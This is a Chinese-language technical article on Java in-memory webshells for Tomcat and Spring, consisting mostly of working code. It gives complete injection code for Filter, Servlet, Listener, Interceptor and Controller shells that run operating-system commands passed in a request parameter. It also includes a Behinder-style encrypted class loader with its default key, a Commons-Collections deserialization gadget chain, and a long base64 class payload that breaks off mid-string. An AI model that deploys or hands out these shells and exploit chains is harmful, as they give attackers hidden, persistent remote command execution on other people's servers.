Tomcat与Spring内存马技术详解<\/h1>

一、Tomcat三种内存马技术<\/h2>

1. Filter型内存马<\/h3>

Tomcat Filter注册流程<\/h4>

FilterDefs<\/strong>：存放FilterDef的数组，存储过滤器名、过滤器实例、作用URL等基本信息<\/li>
FilterConfigs<\/strong>：存放filterConfig的数组，主要存放FilterDef和Filter对象等信息<\/li>
FilterMaps<\/strong>：存放FilterMap的数组，存放FilterName和对应的URLPattern<\/li>
FilterChain<\/strong>：过滤器链，doFilter方法能依次调用链上的Filter<\/li>
WebXml<\/strong>：存放web.xml中内容的类<\/li>

StandardContext<\/strong>：Context接口的标准实现类，代表一个Web应用<\/li> <\/ul>
注入流程<\/h4>

创建恶意Filter<\/li>
利用FilterDef对Filter进行封装<\/li>
将FilterDef添加到FilterDefs和FilterConfig<\/li>
创建FilterMap，将Filter和urlpattern相对应，存放到filterMaps中<\/li>
通常放在最前面确保优先触发<\/li> <\/ol>
关键代码实现<\/h4>
<% \/\/ 获取StandardContext ServletContext servletContext = request.getSession().getServletContext(); Field appctx = servletContext.getClass().getDeclaredField("context"); appctx.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); Field stdctx = applicationContext.getClass().getDeclaredField("context"); stdctx.setAccessible(true); StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); \/\/ 获取filterConfigs Field Configs = standardContext.getClass().getDeclaredField("filterConfigs"); Configs.setAccessible(true); Map filterConfigs = (Map) Configs.get(standardContext); \/\/ 创建恶意filter Filter filter = new Filter() { @Override public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { HttpServletRequest request1 = (HttpServletRequest) servletRequest; if (request1.getParameter("qiu") != null) { byte[] bytes = new byte[1024]; Process process = Runtime.getRuntime().exec(request1.getParameter("qiu")); int len = process.getInputStream().read(bytes); servletResponse.getWriter().write(new String(bytes,0,len)); process.destroy(); return; } filterChain.doFilter(servletRequest, servletResponse); } }; \/\/ 配置FilterDef FilterDef filterDef = new FilterDef(); filterDef.setFilter(filter); filterDef.setFilterName(name); filterDef.setFilterClass(filter.getClass().getName()); standardContext.addFilterDef(filterDef); \/\/ 配置FilterMap FilterMap filterMap = new FilterMap(); filterMap.addURLPattern("\/*"); filterMap.setFilterName(name); filterMap.setDispatcher(DispatcherType.REQUEST.name()); standardContext.addFilterMapBefore(filterMap); \/\/ 创建FilterConfig Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class); constructor.setAccessible(true); ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef); filterConfigs.put(name, filterConfig); %> <\/code><\/pre> 2. Servlet型内存马<\/h3> 注入流程<\/h4> 创建恶意Servlet<\/li> 用Wrapper对其进行封装<\/li> 添加封装后的恶意Wrapper到StandardContext的children中<\/li> 添加ServletMapping将访问的URL和Servlet进行绑定<\/li> 在servletMappings中添加URL路径与name的映射<\/li> <\/ol> 关键代码实现<\/h4> <% \/\/ 创建恶意Servlet class QiuServlet extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { if (req.getParameter("qiu") != null) { byte[] bytes = new byte[1024]; Process process = Runtime.getRuntime().exec(req.getParameter("qiu")); int len = process.getInputStream().read(bytes); resp.getWriter().write(new String(bytes,0,len)); process.destroy(); return; } } } \/\/ 获取StandardContext ServletContext servletContext = request.getSession().getServletContext(); Field appctx = servletContext.getClass().getDeclaredField("context"); appctx.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); Field stdctx = applicationContext.getClass().getDeclaredField("context"); stdctx.setAccessible(true); StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); \/\/ 用Wrapper封装Servlet QiuServlet qiuServlet = new QiuServlet(); org.apache.catalina.Wrapper qiuWrapper = standardContext.createWrapper(); qiuWrapper.setName(name); qiuWrapper.setLoadOnStartup(1); qiuWrapper.setServlet(qiuServlet); qiuWrapper.setServletClass(qiuServlet.getClass().getName()); \/\/ 添加到StandardContext standardContext.addChild(qiuWrapper); standardContext.addServletMappingDecoded("\/Qiu", name); %> <\/code><\/pre> 3. Listener型内存马<\/h3> Listener类型<\/h4> ServletContextListener：监听整个Servlet上下文（创建、销毁）<\/li> ServletContextAttributeListener：监听Servlet上下文属性变化<\/li> ServletRequestListener：监听Request请求（创建、销毁）<\/li> ServletRequestAttributeListener：监听Request属性变化<\/li> HttpSessionListener：监听Session整体状态<\/li> HttpSessionAttributeListener：监听Session属性变化<\/li> <\/ul> 注入流程<\/h4> 创建恶意listener<\/li> 将恶意listener添加到applicationEventListener中<\/li> <\/ol> 关键代码实现<\/h4> <% \/\/ 创建恶意listener class QiuListener implements ServletRequestListener { @Override public void requestDestroyed(ServletRequestEvent sre) { HttpServletRequest req = (HttpServletRequest) sre.getServletRequest(); if (req.getParameter("qiu") != null) { InputStream in = null; boolean isLinux = !System.getProperty("os.name").toLowerCase().contains("win"); try { String[] cmds = isLinux ? new String[]{"sh", "-c", req.getParameter("qiu")} : new String[]{"cmd.exe", "\/c", req.getParameter("qiu")}; in = Runtime.getRuntime().exec(cmds).getInputStream(); Scanner scanner = new Scanner(in).useDelimiter("\\A"); String out = scanner.hasNext() ? scanner.next() : ""; Field requestFiled = req.getClass().getDeclaredField("request"); requestFiled.setAccessible(true); Request request = (Request) requestFiled.get(req); request.getResponse().getWriter().write(out); } catch (Exception e) {} } } } \/\/ 获取StandardContext ServletContext servletContext = request.getSession().getServletContext(); Field appctx = servletContext.getClass().getDeclaredField("context"); appctx.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); Field stdctx = applicationContext.getClass().getDeclaredField("context"); stdctx.setAccessible(true); StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); \/\/ 添加listener QiuListener qiuListener = new QiuListener(); standardContext.addApplicationEventListener(qiuListener); %> <\/code><\/pre> 二、Spring内存马结合反序列化利用<\/h2> 1. Interceptor内存马利用<\/h3> 实现原理<\/h4> 将自定义的Interceptor类加入到RequestMappingHandlerMapping类的adaptedInterceptors属性中注册拦截器<\/p> 关键代码<\/h4> public<\/span> class<\/span> InterMemShell<\/span> extends<\/span> AbstractTranslet {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span> RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span> <\/span><\/span> .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span> <\/span><\/span> <\/span><\/span> AbstractHandlerMapping abstractHandlerMapping =<\/span> context.<\/span>getBean<\/span>(<\/span>AbstractHandlerMapping.<\/span>class<\/span>);<\/span> <\/span><\/span> Field field =<\/span> AbstractHandlerMapping.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> java.<\/span>util<\/span>.<\/span>ArrayList<\/span> adaptedInterceptors =<\/span> (<\/span>java.<\/span>util<\/span>.<\/span>ArrayList<\/span>)<\/span>field.<\/span>get<\/span>(<\/span>abstractHandlerMapping);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 加载恶意拦截器类 <\/span><\/span><\/span><\/span> String b64 =<\/span> "base64 class"<\/span>;<\/span> <\/span><\/span> byte<\/span>[]<\/span> bytes =<\/span> sun.<\/span>misc<\/span>.<\/span>BASE64Decoder<\/span>.<\/span>class<\/span>.<\/span>newInstance<\/span>().<\/span>decodeBuffer<\/span>(<\/span>b64);<\/span> <\/span><\/span> java.<\/span>lang<\/span>.<\/span>ClassLoader<\/span> classLoader =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span> <\/span><\/span> java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Method<\/span> m0 =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span> <\/span><\/span> m0.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> m0.<\/span>invoke<\/span>(<\/span>classLoader,<\/span> className,<\/span> bytes,<\/span> 0<\/span>,<\/span> bytes.<\/span>length<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 添加拦截器 <\/span><\/span><\/span><\/span> adaptedInterceptors.<\/span>add<\/span>(<\/span>classLoader.<\/span>loadClass<\/span>(<\/span>className).<\/span>newInstance<\/span>());<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e){<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>恶意拦截器类<\/h4> public<\/span> class<\/span> magicInterceptor<\/span> extends<\/span> HandlerInterceptorAdapter{<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> boolean<\/span> preHandle<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span> Object handler)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> String code =<\/span> request.<\/span>getParameter<\/span>(<\/span>"qiu"<\/span>);<\/span> <\/span><\/span> if<\/span>(<\/span>code !=<\/span> null<\/span>){<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> java.<\/span>io<\/span>.<\/span>PrintWriter<\/span> writer =<\/span> response.<\/span>getWriter<\/span>();<\/span> <\/span><\/span> String o =<\/span> ""<\/span>;<\/span> <\/span><\/span> ProcessBuilder p;<\/span> <\/span><\/span> if<\/span>(<\/span>System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)){<\/span> <\/span><\/span> p =<\/span> new<\/span> ProcessBuilder(<\/span>new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> code});<\/span> <\/span><\/span> }<\/span>else<\/span>{<\/span> <\/span><\/span> p =<\/span> new<\/span> ProcessBuilder(<\/span>new<\/span> String[]{<\/span>"\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> code});<\/span> <\/span><\/span> }<\/span> <\/span><\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span> c =<\/span> new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>p.<\/span>start<\/span>().<\/span>getInputStream<\/span>()).<\/span>useDelimiter<\/span>(<\/span>"\\\\A"<\/span>);<\/span> <\/span><\/span> o =<\/span> c.<\/span>hasNext<\/span>()<\/span> ?<\/span> c.<\/span>next<\/span>():<\/span> o;<\/span> <\/span><\/span> c.<\/span>close<\/span>();<\/span> <\/span><\/span> writer.<\/span>write<\/span>(<\/span>o);<\/span> <\/span><\/span> writer.<\/span>flush<\/span>();<\/span> <\/span><\/span> writer.<\/span>close<\/span>();<\/span> <\/span><\/span> }<\/span>catch<\/span> (<\/span>Exception e){<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> false<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> true<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. Controller内存马利用<\/h3> 冰蝎逻辑马子<\/h4> public<\/span> class<\/span> magicController<\/span> {<\/span> <\/span><\/span> public<\/span> void<\/span> shell<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> HttpServletRequest request =<\/span> ((<\/span>ServletRequestAttributes)<\/span> (<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>())).<\/span>getRequest<\/span>();<\/span> <\/span><\/span> HttpServletResponse response =<\/span> ((<\/span>ServletRequestAttributes)<\/span> (<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>())).<\/span>getResponse<\/span>();<\/span> <\/span><\/span> HttpSession session =<\/span> request.<\/span>getSession<\/span>();<\/span> <\/span><\/span> <\/span><\/span> HashMap pageContext =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> pageContext.<\/span>put<\/span>(<\/span>"request"<\/span>,<\/span>request);<\/span> <\/span><\/span> pageContext.<\/span>put<\/span>(<\/span>"response"<\/span>,<\/span>response);<\/span> <\/span><\/span> pageContext.<\/span>put<\/span>(<\/span>"session"<\/span>,<\/span>session);<\/span> <\/span><\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>request.<\/span>getMethod<\/span>().<\/span>equals<\/span>(<\/span>"POST"<\/span>))<\/span> {<\/span> <\/span><\/span> String k=<\/span>"e45e329feb5d925b"<\/span>;<\/span> \/\/ 默认连接密码rebeyond的MD5前16位 <\/span><\/span><\/span><\/span> session.<\/span>putValue<\/span>(<\/span>"u"<\/span>,<\/span>k);<\/span> <\/span><\/span> Cipher c=<\/span>Cipher.<\/span>getInstance<\/span>(<\/span>"AES"<\/span>);<\/span> <\/span><\/span> c.<\/span>init<\/span>(<\/span>2<\/span>,<\/span>new<\/span> SecretKeySpec(<\/span>k.<\/span>getBytes<\/span>(),<\/span>"AES"<\/span>));<\/span> <\/span><\/span> Method method =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.ClassLoader"<\/span>).<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span> <\/span><\/span> method.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> byte<\/span>[]<\/span> evilclass_byte =<\/span> c.<\/span>doFinal<\/span>(<\/span>new<\/span> sun.<\/span>misc<\/span>.<\/span>BASE64Decoder<\/span>().<\/span>decodeBuffer<\/span>(<\/span>request.<\/span>getReader<\/span>().<\/span>readLine<\/span>()));<\/span> <\/span><\/span> Class evilclass =<\/span> (<\/span>Class)<\/span> method.<\/span>invoke<\/span>(<\/span>this<\/span>.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>(),<\/span> evilclass_byte,<\/span>0<\/span>,<\/span> evilclass_byte.<\/span>length<\/span>);<\/span> <\/span><\/span> evilclass.<\/span>newInstance<\/span>().<\/span>equals<\/span>(<\/span>pageContext);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e){<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>注入恶意controller<\/h4> public<\/span> class<\/span> ConMemShell<\/span> extends<\/span> AbstractTranslet {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> String className =<\/span> "magicController"<\/span>;<\/span> <\/span><\/span> String b64 =<\/span> "b64"<\/span>;<\/span> <\/span><\/span> byte<\/span>[]<\/span> d =<\/span> new<\/span> sun.<\/span>misc<\/span>.<\/span>BASE64Decoder<\/span>().<\/span>decodeBuffer<\/span>(<\/span>b64);<\/span> <\/span><\/span> java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Method<\/span> m =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>});<\/span> <\/span><\/span> m.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> m.<\/span>invoke<\/span>(<\/span>Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>(),<\/span> new<\/span> Object[]{<\/span>className,<\/span> d,<\/span> 0<\/span>,<\/span> d.<\/span>length<\/span>});<\/span> <\/span><\/span> <\/span><\/span> WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span> <\/span><\/span> .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span> <\/span><\/span> <\/span><\/span> PatternsRequestCondition url =<\/span> new<\/span> PatternsRequestCondition(<\/span>"\/qiu"<\/span>);<\/span> <\/span><\/span> RequestMappingInfo info =<\/span> new<\/span> RequestMappingInfo(<\/span>url,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> RequestMappingHandlerMapping rs =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span> <\/span><\/span> Method mm =<\/span> Class.<\/span>forName<\/span>(<\/span>className).<\/span>getMethod<\/span>(<\/span>"shell"<\/span>);<\/span> <\/span><\/span> rs.<\/span>registerMapping<\/span>(<\/span>info,<\/span> Class.<\/span>forName<\/span>(<\/span>className).<\/span>newInstance<\/span>(),<\/span> mm);<\/span> <\/span><\/span> }<\/span>catch<\/span> (<\/span>Exception e){<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>三、实战利用技巧<\/h2> 1. 绕过JDK高版本限制<\/h3> 在jdk8u71之后，AnnotationInvocationHandler中的memberValues被替换为了linkedhashmap，可以使用CC6改造链：<\/p> public<\/span> class<\/span> CC6V2<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span> <\/span><\/span> setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]<\/span> {<\/span>payloads});<\/span> <\/span><\/span> setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "qiuqiu"<\/span>);<\/span> <\/span><\/span> setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span> <\/span><\/span> <\/span><\/span> Transformer transformer =<\/span> new<\/span> InvokerTransformer(<\/span>"getClass"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> Map innerMap =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> Map outerMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> transformer);<\/span> <\/span><\/span> TiedMapEntry tme =<\/span> new<\/span> TiedMapEntry(<\/span>outerMap,<\/span> templates);<\/span> <\/span><\/span> Map expMap =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> expMap.<\/span>put<\/span>(<\/span>tme,<\/span> "qiu"<\/span>);<\/span> <\/span><\/span> outerMap.<\/span>clear<\/span>();<\/span> <\/span><\/span> setFieldValue(<\/span>transformer,<\/span> "iMethodName"<\/span>,<\/span> "newTransformer"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. Spring拦截器内存马完整实现<\/h3> public<\/span> class<\/span> SpringInterceptorMemShell<\/span> extends<\/span> AbstractTranslet {<\/span> <\/span><\/span> static<\/span> String b64 =<\/span> "<\/span>yv66vgAAADQBSAoAZQCFCACGCQBkAIcIAIgJAGQAiQgAigkAZACLCgBkAIwJAI0AjggAjwoAkACRCACSCwCTAJQIAJUKABMAlgoAEwCXCQCYAJkIAJoHAJsIAJwIAJ0IAJ4IAJ8HAKAKAKEAogoAoQCjCgCkAKUKABgApggApwoAGACoCgAYAKkLAKoAqwoArACRCwCTAK0LAJMArggArwgAsAsAkwCxBwCyCgAnAIUIALMKACcAtAgAtQgAtggAtwsAuAC5CAC6CgC7ALwHAL0HAL4KADIAhQsAuAC\/<\/span>CgAyAMAIAMEKADIAwgoAMgDDCgATAMQKADEAxQoAuwDGBwDHCgA8AIULAJMAyAoAyQDKCgA8AMsKALsAzAgAzQoARQDOCADPBwDQBwDRCQDSANMKAEUA1AoA1QDWCgBMANcKAEUA2AcA2QoA0gDaCgDVANsKAEUA3AoATACWCADdBwDeCgBSAN8KAOAA4QoA4ADiCADjCgBbAOQJAGQA5QcA5ggA5wcA6AcA6QoAXADfBwDqCgBeAN8HAOsKAGAA3wcA7AoAYgDfBwDtBwDuAQASbXlDbGFzc0xvYWRlckNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBABBiYXNpY0NtZFNoZWxsUHdkAQASTGphdmEvbGFuZy9TdHJpbmc7AQATYmVoaW5kZXJTaGVsbEhlYWRlcgEAEGJlaGluZGVyU2hlbGxQd2QBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEADVN0YWNrTWFwVGFibGUHAJsHAO8HAPAHAN4BAApFeGNlcHRpb25zAQAKaW5pdGlhbGl6ZQcA7QcA6AcA5gcA8QcA6QcA6gcA6wcA7AEAClNvdXJjZUZpbGUBAB9EeW5hbWljSW50ZXJjZXB0b3JUZW1wbGF0ZS5qYXZhAQAZUnVudGltZVZpc2libGVBbm5vdGF0aW9ucwEAK0xvcmcvc3ByaW5nZnJhbWV3b3JrL3N0ZXJlb3R5cGUvQ29udHJvbGxlcjsMAGwAbQEABHBhc3MMAGgAaQEADFgtT3B0aW9ucy1BaQwAagBpAQAQZTQ1ZTMyOWZlYjVkOTI1YgwAawBpDAB4AG0HAPIMAPMA9AEAIlsrXSBEeW5hbWljIEludGVyY2VwdG9yIHNheXMgaGVsbG8HAPUMAPYA9wEABHR5cGUHAPgMAPkA+<\/span>gEABWJhc2ljDAD7APwMAP0A\/<\/span>gcA\/<\/span>wwBAABpAQABLwEAEGphdmEvbGFuZy9TdHJpbmcBAAcvYmluL3NoAQACLWMBAANjbWQBAAIvQwEAEWphdmEvdXRpbC9TY2FubmVyBwEBDAECAQMMAQQBBQcBBgwBBwEIDABsAQkBAAJcQQwBCgELDAEMAQ0HAQ4MAQ8BEAcBEQwBEgD6DAETAQ0BAARQT1NUAQAGUWl1UUl1DAEUARUBABFqYXZhL3V0aWwvSGFzaE1hcAEAB3JlcXVlc3QMARYBFwEACHJlc3BvbnNlAQAHc2Vzc2lvbgEAAXUHARgMARkBGgEAA0FFUwcA7wwBGwEcAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDAEdAR4MAR8BIAEAAAwBHwEhDAEiAQ0MASMBJAwAbAElDAEmAScBABZzdW4vbWlzYy9CQVNFNjREZWNvZGVyDAEoASkHASoMASsBDQwBLAEtDAEuAS8BABVqYXZhLmxhbmcuQ2xhc3NMb2FkZXIMATABMQEAC2RlZmluZUNsYXNzAQAPamF2YS9sYW5nL0NsYXNzAQACW0IHATIMATMAZwwBNAE1BwDxDAE2ATcMATgBOQwBOgE7AQAQamF2YS9sYW5nL09iamVjdAwBPAE9DAE+<\/span>AT8MAUABQQEAB1FpdVlZRFMBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAFCAG0HAUMMAUQBRQwBRgE7AQAnY29tLmZlaWhvbmcubGRhcC50ZW1wbGF0ZS5NeUNsYXNzTG9hZGVyDAFHATEMAGYAZwEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uAQMceXY2NnZnQUFBRElBR3dvQUJRQVdCd0FYQ2dBQ0FCWUtBQUlBR0FjQUdRRUFCanhwYm1sMFBnRUFHaWhNYW1GMllTOXNZVzVuTDBOc1lYTnpURzloWkdWeU95bFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFFa3h2WTJGc1ZtRnlhV0ZpYkdWVVlXSnNaUUVBQkhSb2FYTUJBQ2xNWTI5dEwyWmxhV2h2Ym1jdmJHUmhjQzkwWlcxd2JHRjBaUzlOZVVOc1lYTnpURzloWkdWeU93RUFBV01CQUJkTWFtRjJZUzlzWVc1bkwwTnNZWE56VEc5aFpHVnlPd0VBQzJSbFptbHVaVU5zWVhOekFRQXNLRnRDVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjMHh2WVdSbGNqc3BUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQVZpZVhSbGN3RUFBbHRDQVFBTFkyeGhjM05NYjJGa1pYSUJBQXBUYjNWeVkyVkdhV3hsQVFBU1RYbERiR0Z6YzB4dllXUmxjaTVxWVhaaERBQUdBQWNCQUNkamIyMHZabVZwYUc5dVp5OXNaR0Z3TDNSbGJYQnNZWFJsTDAxNVEyeGhjM05NYjJGa1pYSU1BQThBR2dFQUZXcGhkbUV2YkdGdVp5OURiR0Z6YzB4dllXUmxjZ0VBRnloYlFrbEpLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBQ0VBQWdBRkFBQUFBQUFDQUFBQUJnQUhBQUVBQ0FBQUFEb0FBZ0FDQUFBQUJpb3J0d0FCc1FBQUFBSUFDUUFBQUFZQUFRQUFBQVFBQ2dBQUFCWUFBZ0FBQUFZQUN3QU1BQUFBQUFBR0FBMEFEZ0FCQUFrQUR3QVFBQUVBQ0FBQUFFUUFCQUFDQUFBQUVMc0FBbGtydHdBREtnTXF2cllBQkxBQUFBQUNBQWtBQUFBR0FBRUFBQUFJQUFvQUFBQVdBQUlBQUFBUUFCRUFFZ0FBQUFBQUVBQVRBQTRBQVFBQkFCUUFBQUFDQUJVPQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAE2phdmEvaW8vSU9FeGNlcHRpb24BACtqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uVGFyZ2V0RXhjZXB0aW9uAQAaRHluYW1pY0ludGVyY2VwdG9yVGVtcGxhdGUBAEFvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L2hhbmRsZXIvSGFuZGxlckludGVyY2VwdG9yQWRhcHRlcgEAE2phdmF4L2NyeXB0by9DaXBoZXIBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAHaXNFbXB0eQEAAygpWgEADGphdmEvaW8vRmlsZQEACXNlcGFyYXRvcgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACgoW0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQERamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc <\/span><\/span><\/code><\/pre>